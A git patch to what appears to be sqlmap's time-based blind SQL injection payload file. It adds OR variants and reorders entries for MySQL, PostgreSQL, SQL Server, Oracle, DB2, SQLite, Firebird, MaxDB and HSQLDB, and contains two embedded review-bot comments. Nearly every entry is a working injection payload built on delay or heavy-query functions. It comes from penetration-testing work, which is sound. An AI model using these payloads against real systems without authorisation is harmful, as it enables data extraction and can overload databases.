From b2fca35c3684a8e02e8f444524dd33f652b04a62 Mon Sep 17 00:00:00 2001 From: "Bernardo Damele A. G." Date: Tue, 3 Mar 2015 14:22:20 +0000 Subject: [PATCH] consolidated some time-based blind payloads - issue #1169 --- xml/payloads/05_time_blind.xml | 954 +++++++++++++++++++++------------ 1 file changed, 599 insertions(+), 355 deletions(-) diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml index 2cec7931e..95a6f5160 100644 --- a/xml/payloads/05_time_blind.xml +++ b/xml/payloads/05_time_blind.xml @@ -1,7 +1,7 @@ - + MySQL > 5.0.11 AND time-based blind (SELECT) 5 @@ -22,10 +22,30 @@ + + MySQL > 5.0.11 OR time-based blind (SELECT) + 5 + 1 + 3 + 1,2,3 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 AND time-based blind (SELECT - comment) 5 - 4 + 3 1 1,2,3 1 @@ -43,10 +63,31 @@ + + MySQL > 5.0.11 OR time-based blind (SELECT - comment) + 5 + 3 + 3 + 1,2,3 + 1 + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
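Review bot: The OR entries added from this hunk onward (MySQL here, then PostgreSQL, SQL Server/Sybase, Oracle, DB2, SQLite, Firebird, MaxDB and HSQLDB in the later hunks) all carry 3 in the third numeric field, but nothing in the file says why. That field is presumably the risk value; the element names are not visible in this rendering. An OR condition can be evaluated for rows the original predicate would have excluded, so the delay or heavy query may run many times and load the database under test well beyond a single [SLEEPTIME]. I would document this once above the first OR entry, for example `<!-- OR time-based tests: the delay may be evaluated once per row of the queried table; keep risk at 3 so they only run when the tester raises --risk -->`.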
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 AND time-based blind 5 - 1 + 2 1 1,2,3 1 @@ -63,6 +104,26 @@ + + MySQL > 5.0.11 OR time-based blind + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + > 5.0.11 +
+
+ MySQL > 5.0.11 AND time-based blind (comment) 5 @@ -84,6 +145,27 @@ + + MySQL > 5.0.11 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # + + + + +
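Review bot: The request payload of the added "MySQL > 5.0.11 OR time-based blind" entry is `OR SLEEP([SLEEPTIME])`, which drops the `[RANDNUM]=` comparison that its own vector uses. The entry it replaces had `OR [RANDNUM]=SLEEP([SLEEPTIME])` (removed further down in this patch), and the "(comment)" variant in the next hunk has the same shortened shape. The other OR entries that compare against [RANDNUM] keep the comparison in the request payload, so a detection request that differs structurally from the vector may confirm a parameter the vector then fails on, or miss one it would handle. If the shorter form is deliberate (perhaps to mirror the AND entry, whose payload line is outside this hunk), a one-line XML comment saying so would do; otherwise keep `OR [RANDNUM]=SLEEP([SLEEPTIME])` in both entries.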
+ MySQL + > 5.0.11 +
+
+ MySQL < 5.0.12 AND time-based blind (heavy query) 5 @@ -103,6 +185,25 @@ + + MySQL < 5.0.12 OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL +
+
+ MySQL < 5.0.12 AND time-based blind (heavy query - comment) 5 @@ -123,6 +224,26 @@ + + MySQL < 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL +
+
+ PostgreSQL > 8.1 AND time-based blind 5 @@ -143,10 +264,30 @@ + + PostgreSQL > 8.1 OR time-based blind + 5 + 1 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ PostgreSQL > 8.1 AND time-based blind (comment) 5 - 5 + 4 1 1,2,3 1 @@ -164,10 +305,31 @@ + + PostgreSQL > 8.1 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ PostgreSQL AND time-based blind (heavy query) 5 - 3 + 2 2 1,2,3 1 @@ -183,6 +345,25 @@ + + PostgreSQL OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ PostgreSQL AND time-based blind (heavy query - comment) 5 @@ -203,6 +384,26 @@ + + PostgreSQL OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ Microsoft SQL Server/Sybase time-based blind 5 @@ -211,6 +412,27 @@ 0 1 IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Microsoft SQL Server/Sybase time-based blind (comment) + 5 + 4 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' WAITFOR DELAY '0:0:[SLEEPTIME]' -- @@ -246,6 +468,27 @@ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) 5 @@ -268,6 +511,28 @@ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ Oracle AND time-based blind 5 @@ -287,10 +552,29 @@ + + Oracle OR time-based blind + 5 + 1 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ Oracle AND time-based blind (comment) 5 - 5 + 4 1 1,2,3 1 @@ -307,6 +591,26 @@ + + Oracle OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ Oracle AND time-based blind (heavy query) 5 @@ -326,6 +630,25 @@ + + Oracle OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ Oracle AND time-based blind (heavy query - comment) 5 @@ -346,6 +669,104 @@ + + Oracle OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + IBM DB2 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ SQLite > 2.0 AND time-based blind (heavy query) 5 @@ -366,6 +787,26 @@ + + SQLite > 2.0 OR time-based blind (heavy query) + 5 + 3 + 3 + 1 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ SQLite > 2.0 AND time-based blind (heavy query - comment) 5 @@ -387,6 +828,27 @@ + + SQLite > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ Firebird AND time-based blind (heavy query) 5 @@ -407,6 +869,26 @@ + + Firebird OR time-based blind (heavy query) + 5 + 4 + 3 + 1 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ Firebird AND time-based blind (heavy query - comment) 5 @@ -428,10 +910,31 @@ + + Firebird OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ SAP MaxDB AND time-based blind (heavy query) 5 - 3 + 4 2 1,2,3 1 @@ -447,6 +950,25 @@ + + SAP MaxDB OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ SAP MaxDB AND time-based blind (heavy query - comment) 5 @@ -468,44 +990,25 @@ - IBM DB2 AND time-based blind (heavy query) - 5 - 3 - 2 - 1,2,3 - 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
- IBM DB2 -
-
- - - IBM DB2 AND time-based blind (heavy query - comment) + SAP MaxDB OR time-based blind (heavy query - comment) 5 5 - 2 + 3 1,2,3 1 - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) --
- IBM DB2 + SAP MaxDB
- + HSQLDB >= 1.7.2 AND time-based blind (heavy query) 5 @@ -526,6 +1029,26 @@ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) 5 @@ -546,7 +1069,28 @@ >= 1.7.2 - + + + HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ HSQLDB > 2.0 AND time-based blind (heavy query) 5 @@ -567,6 +1111,26 @@ + + HSQLDB > 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) + + + + +
+ HSQLDB + > 2.0 +
+
+ HSQLDB > 2.0 AND time-based blind (heavy query - comment) 5 @@ -587,332 +1151,12 @@ > 2.0 - - - - - - MySQL > 5.0.11 OR time-based blind (SELECT) - 5 - 1 - 3 - 1,2,3 - 2 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 -
-
- - - MySQL > 5.0.11 OR time-based blind (SELECT - comment) - 5 - 4 - 3 - 1,2,3 - 2 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - > 5.0.11 -
-
- - - MySQL > 5.0.11 OR time-based blind - 5 - 2 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) - - OR [RANDNUM]=SLEEP([SLEEPTIME]) - - - - -
- MySQL - > 5.0.11 -
-
- - - MySQL < 5.0.12 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) - - OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) - - - - -
- MySQL -
-
- - - PostgreSQL > 8.1 OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) - - - - -
- PostgreSQL - > 8.1 -
-
- - - PostgreSQL OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) - - - - -
- PostgreSQL -
-
- - - Microsoft SQL Server/Sybase OR time-based blind (heavy query) - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) - - - - -
- Microsoft SQL Server - Sybase - Windows -
-
- - - Oracle OR time-based blind - 5 - 3 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) - - OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) - - - - -
- Oracle -
-
- - - Oracle OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) - - OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) - - - - -
- Oracle -
-
- - - SQLite > 2.0 OR time-based blind (heavy query) - 5 - 4 - 3 - 1 - 2 - OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) - - OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) - - - - -
- SQLite - > 2.0 -
-
- - - Firebird OR time-based blind (heavy query) - 5 - 5 - 3 - 1 - 2 - OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) - - OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) - - - - -
- Firebird - >= 2.0 -
-
- - - SAP MaxDB OR time-based blind (heavy query - comment) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) - - OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) - - - - -
- SAP MaxDB -
-
- - - IBM DB2 OR time-based blind (heavy query) - 5 - 4 - 3 - 1,2,3 - 2 - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) - - OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) - - - - -
- IBM DB2 -
-
- - - HSQLDB >= 1.7.2 OR time-based blind (heavy query) - 5 - 4 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) - - - - -
- HSQLDB - >= 1.7.2 -
-
- - - HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) - 5 - 5 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) - -- - - - - -
- HSQLDB - >= 1.7.2 -
-
- - - HSQLDB > 2.0 OR time-based blind (heavy query) - 5 - 4 - 2 - 1,2,3 - 1 - OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END - - OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) - - - - -
- HSQLDB - > 2.0 -
-
HSQLDB > 2.0 OR time-based blind (heavy query - comment) 5 5 - 2 + 3 1,2,3 1 OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END @@ -929,7 +1173,7 @@ - +